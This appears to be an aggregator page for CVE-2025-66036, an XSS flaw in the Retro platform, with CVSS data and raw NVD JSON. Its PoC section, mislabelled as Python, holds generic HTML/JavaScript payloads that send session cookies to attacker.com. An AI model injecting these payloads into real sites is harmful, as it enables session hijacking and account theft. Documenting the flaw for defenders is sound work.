Security Vulnerability Report
中文
CVE-2025-66036 CVSS 6.1 MEDIUM

CVE-2025-66036

Published: 2025-11-29 02:15:52
Last Modified: 2026-04-15 00:35:42

Description

Retro is an online platform providing items of vintage collections. Prior to version 2.4.7, Retro is vulnerable to a cross-site scripting (XSS) in the input handling component. This issue has been patched in version 2.4.7.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Retro < 2.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for CVE-2025-66036 --> <!-- Inject this payload in any user input field (e.g., name, description, comment) --> <script> // Steal session cookies var cookies = document.cookie; var attacker_server = 'https://attacker.com/steal?c=' + encodeURIComponent(cookies); // Send stolen data to attacker fetch(attacker_server, { method: 'GET', mode: 'no-cors' }); // Alternatively, perform DOM-based attacks // Example: Redirect user to phishing site // window.location.href = 'https://attacker.com/phishing?redirect=' + window.location.href; </script> <!-- Alternative payload using event handlers --> <img src=x onerror="this.src='https://attacker.com/log?data='+document.cookie"> <!-- SVG-based payload --> <svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66036", "sourceIdentifier": "[email protected]", "published": "2025-11-29T02:15:52.257", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Retro is an online platform providing items of vintage collections. Prior to version 2.4.7, Retro is vulnerable to a cross-site scripting (XSS) in the input handling component. This issue has been patched in version 2.4.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/Anjaliavv51/Retro/security/advisories/GHSA-gvv6-p6h6-2vj2", "source": "[email protected]"}]}}